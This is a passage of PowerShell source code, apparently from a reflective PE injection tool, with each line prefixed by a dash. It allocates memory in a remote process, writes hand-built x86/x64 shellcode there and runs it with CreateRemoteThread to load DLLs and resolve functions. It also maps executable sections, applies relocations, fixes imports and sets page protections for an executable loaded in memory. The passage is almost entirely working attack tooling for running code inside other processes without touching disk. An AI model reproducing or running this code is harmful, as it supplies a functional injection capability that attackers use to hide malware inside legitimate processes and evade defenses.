- $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
- }
- else
- {
- [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
- $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
- }
- if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)
- {
- $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'
- }
- elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)
- {
- $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'
- }
- else
- {
- Throw "PE file is not an EXE or DLL"
- }
- return $PEInfo
- }
- Function Import-DllInRemoteProcess
- {
- Param(
- [Parameter(Position=0, Mandatory=$true)]
- [IntPtr]
- $RemoteProcHandle,
- [Parameter(Position=1, Mandatory=$true)]
- [IntPtr]
- $ImportDllPathPtr
- )
- $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
- $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
- $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)
- $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
- if ($RImportDllPathPtr -eq [IntPtr]::Zero)
- {
- Throw "Unable to allocate memory in the remote process"
- }
- [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
- $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)
- if ($Success -eq $false)
- {
- Throw "Unable to write DLL path to remote process memory"
- }
- if ($DllPathSize -ne $NumBytesWritten)
- {
- Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
- }
- $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
- $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA")
- [IntPtr]$DllAddress = [IntPtr]::Zero
- if ($PEInfo.PE64Bit -eq $true)
- {
- $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
- if ($LoadLibraryARetMem -eq [IntPtr]::Zero)
- {
- Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA"
- }
- $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
- $LoadLibrarySC2 = @(0x48, 0xba)
- $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)
- $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
- $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)
- $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
- $SCPSMemOriginal = $SCPSMem
- Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
- Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
- Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
- Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)
- $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
- if ($RSCAddr -eq [IntPtr]::Zero)
- {
- Throw "Unable to allocate memory in the remote process for shellcode"
- }
- $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
- if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
- {
- Throw "Unable to write shellcode to remote process memory."
- }
- $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
- $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
- if ($Result -ne 0)
- {
- Throw "Call to CreateRemoteThread to call GetProcAddress failed."
- }
- [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
- $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
- if ($Result -eq $false)
- {
- Throw "Call to ReadProcessMemory failed"
- }
- [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
- $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
- $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
- }
- else
- {
- [IntPtr]$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions
- $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
- if ($Result -ne 0)
- {
- Throw "Call to CreateRemoteThread to call GetProcAddress failed."
- }
- [Int32]$ExitCode = 0
- $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)
- if (($Result -eq 0) -or ($ExitCode -eq 0))
- {
- Throw "Call to GetExitCodeThread failed"
- }
- [IntPtr]$DllAddress = [IntPtr]$ExitCode
- }
- $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
- return $DllAddress
- }
- Function Get-RemoteProcAddress
- {
- Param(
- [Parameter(Position=0, Mandatory=$true)]
- [IntPtr]
- $RemoteProcHandle,
- [Parameter(Position=1, Mandatory=$true)]
- [IntPtr]
- $RemoteDllHandle,
- [Parameter(Position=2, Mandatory=$true)]
- [IntPtr]
- $FunctionNamePtr,
- [Parameter(Position=3, Mandatory=$true)]
- [Bool]
- $LoadByOrdinal
- )
- $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
- [IntPtr]$RFuncNamePtr = [IntPtr]::Zero
- if (-not $LoadByOrdinal)
- {
- $FunctionName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($FunctionNamePtr)
- $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)
- $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
- if ($RFuncNamePtr -eq [IntPtr]::Zero)
- {
- Throw "Unable to allocate memory in the remote process"
- }
- [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
- $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)
- if ($Success -eq $false)
- {
- Throw "Unable to write DLL path to remote process memory"
- }
- if ($FunctionNameSize -ne $NumBytesWritten)
- {
- Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
- }
- }
- else
- {
- $RFuncNamePtr = $FunctionNamePtr
- }
- $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
- $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress")
- $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
- if ($GetProcAddressRetMem -eq [IntPtr]::Zero)
- {
- Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress"
- }
- [Byte[]]$GetProcAddressSC = @()
- if ($PEInfo.PE64Bit -eq $true)
- {
- $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
- $GetProcAddressSC2 = @(0x48, 0xba)
- $GetProcAddressSC3 = @(0x48, 0xb8)
- $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)
- $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
- }
- else
- {
- $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)
- $GetProcAddressSC2 = @(0xb9)
- $GetProcAddressSC3 = @(0x51, 0x50, 0xb8)
- $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)
- $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)
- }
- $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)
- $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
- $SCPSMemOriginal = $SCPSMem
- Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
- Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
- Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
- Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
- Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)
- $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
- if ($RSCAddr -eq [IntPtr]::Zero)
- {
- Throw "Unable to allocate memory in the remote process for shellcode"
- }
- [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
- $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
- if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
- {
- Throw "Unable to write shellcode to remote process memory."
- }
- $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
- $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
- if ($Result -ne 0)
- {
- Throw "Call to CreateRemoteThread to call GetProcAddress failed."
- }
- [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
- $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
- if (($Result -eq $false) -or ($NumBytesWritten -eq 0))
- {
- Throw "Call to ReadProcessMemory failed"
- }
- [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
- $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
- $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
- if (-not $LoadByOrdinal)
- {
- $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
- }
- return $ProcAddress
- }
- Function Copy-Sections
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [Byte[]]
- $PEBytes,
- [Parameter(Position = 1, Mandatory = $true)]
- [System.Object]
- $PEInfo,
- [Parameter(Position = 2, Mandatory = $true)]
- [System.Object]
- $Win32Functions,
- [Parameter(Position = 3, Mandatory = $true)]
- [System.Object]
- $Win32Types
- )
- for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
- {
- [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
- $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
- [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))
- $SizeOfRawData = $SectionHeader.SizeOfRawData
- if ($SectionHeader.PointerToRawData -eq 0)
- {
- $SizeOfRawData = 0
- }
- if ($SizeOfRawData -gt $SectionHeader.VirtualSize)
- {
- $SizeOfRawData = $SectionHeader.VirtualSize
- }
- if ($SizeOfRawData -gt 0)
- {
- Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null
- [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)
- }
- if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)
- {
- $Difference = $SectionHeader.VirtualSize - $SizeOfRawData
- [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))
- Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null
- $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null
- }
- }
- }
- Function Update-MemoryAddresses
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [System.Object]
- $PEInfo,
- [Parameter(Position = 1, Mandatory = $true)]
- [Int64]
- $OriginalImageBase,
- [Parameter(Position = 2, Mandatory = $true)]
- [System.Object]
- $Win32Constants,
- [Parameter(Position = 3, Mandatory = $true)]
- [System.Object]
- $Win32Types
- )
- [Int64]$BaseDifference = 0
- $AddDifference = $true
- [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)
- if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `
- -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))
- {
- return
- }
- elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)
- {
- $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)
- $AddDifference = $false
- }
- elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)
- {
- $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)
- }
- [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))
- while($true)
- {
- $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)
- if ($BaseRelocationTable.SizeOfBlock -eq 0)
- {
- break
- }
- [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))
- $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2
- for($i = 0; $i -lt $NumRelocations; $i++)
- {
- $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))
- [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])
- [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF
- [UInt16]$RelocType = $RelocationInfo -band 0xF000
- for ($j = 0; $j -lt 12; $j++)
- {
- $RelocType = [Math]::Floor($RelocType / 2)
- }
- if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `
- -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))
- {
- [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))
- [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])
- if ($AddDifference -eq $true)
- {
- [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
- }
- else
- {
- [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
- }
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
- }
- elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)
- {
- Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo"
- }
- }
- $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))
- }
- }
- Function Import-DllImports
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [System.Object]
- $PEInfo,
- [Parameter(Position = 1, Mandatory = $true)]
- [System.Object]
- $Win32Functions,
- [Parameter(Position = 2, Mandatory = $true)]
- [System.Object]
- $Win32Types,
- [Parameter(Position = 3, Mandatory = $true)]
- [System.Object]
- $Win32Constants,
- [Parameter(Position = 4, Mandatory = $false)]
- [IntPtr]
- $RemoteProcHandle
- )
- $RemoteLoading = $false
- if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)
- {
- $RemoteLoading = $true
- }
- if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
- {
- [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
- while ($true)
- {
- $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
- if ($ImportDescriptor.Characteristics -eq 0 `
- -and $ImportDescriptor.FirstThunk -eq 0 `
- -and $ImportDescriptor.ForwarderChain -eq 0 `
- -and $ImportDescriptor.Name -eq 0 `
- -and $ImportDescriptor.TimeDateStamp -eq 0)
- {
- Write-Verbose "Done importing DLL imports"
- break
- }
- $ImportDllHandle = [IntPtr]::Zero
- $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))
- $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
- if ($RemoteLoading -eq $true)
- {
- $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr
- }
- else
- {
- $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)
- }
- if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))
- {
- throw "Error importing DLL, DLLName: $ImportDllPath"
- }
- [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)
- [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics)
- [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
- while ($OriginalThunkRefVal -ne [IntPtr]::Zero)
- {
- $LoadByOrdinal = $false
- [IntPtr]$ProcedureNamePtr = [IntPtr]::Zero
- [IntPtr]$NewThunkRef = [IntPtr]::Zero
- if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]$OriginalThunkRefVal -lt 0)
- {
- [IntPtr]$ProcedureNamePtr = [IntPtr]$OriginalThunkRefVal -band 0xffff
- $LoadByOrdinal = $true
- }
- elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]$OriginalThunkRefVal -lt 0)
- {
- [IntPtr]$ProcedureNamePtr = [Int64]$OriginalThunkRefVal -band 0xffff
- $LoadByOrdinal = $true
- }
- else
- {
- [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)
- $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))
- $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)
- $ProcedureNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ProcedureName)
- }
- if ($RemoteLoading -eq $true)
- {
- [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionNamePtr $ProcedureNamePtr -LoadByOrdinal $LoadByOrdinal
- }
- else
- {
- [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressIntPtr.Invoke($ImportDllHandle, $ProcedureNamePtr)
- }
- if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)
- {
- if ($LoadByOrdinal)
- {
- Throw "New function reference is null, this is almost certainly a bug in this script. Function Ordinal: $ProcedureNamePtr. Dll: $ImportDllPath"
- }
- else
- {
- Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath"
- }
- }
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)
- $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
- [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
- [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
- if ((-not $LoadByOrdinal) -and ($ProcedureNamePtr -ne [IntPtr]::Zero))
- {
- [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcedureNamePtr)
- $ProcedureNamePtr = [IntPtr]::Zero
- }
- }
- $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
- }
- }
- }
- Function Get-VirtualProtectValue
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [UInt32]
- $SectionCharacteristics
- )
- $ProtectionFlag = 0x0
- if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)
- {
- if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
- {
- if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
- {
- $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE
- }
- else
- {
- $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ
- }
- }
- else
- {
- if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
- {
- $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY
- }
- else
- {
- $ProtectionFlag = $Win32Constants.PAGE_EXECUTE
- }
- }
- }
- else
- {
- if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
- {
- if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
- {
- $ProtectionFlag = $Win32Constants.PAGE_READWRITE
- }
- else
- {
- $ProtectionFlag = $Win32Constants.PAGE_READONLY
- }
- }
- else
- {
- if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
- {
- $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY
- }
- else
- {
- $ProtectionFlag = $Win32Constants.PAGE_NOACCESS
- }
- }
- }
- if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)
- {
- $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE
- }
- return $ProtectionFlag
- }
- Function Update-MemoryProtectionFlags
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [System.Object]
- $PEInfo,
- [Parameter(Position = 1, Mandatory = $true)]
- [System.Object]
- $Win32Functions,
- [Parameter(Position = 2, Mandatory = $true)]
- [System.Object]
- $Win32Constants,
- [Parameter(Position = 3, Mandatory = $true)]
- [System.Object]
- $Win32Types
- )
- for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
- {
- [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
- $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
- [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)
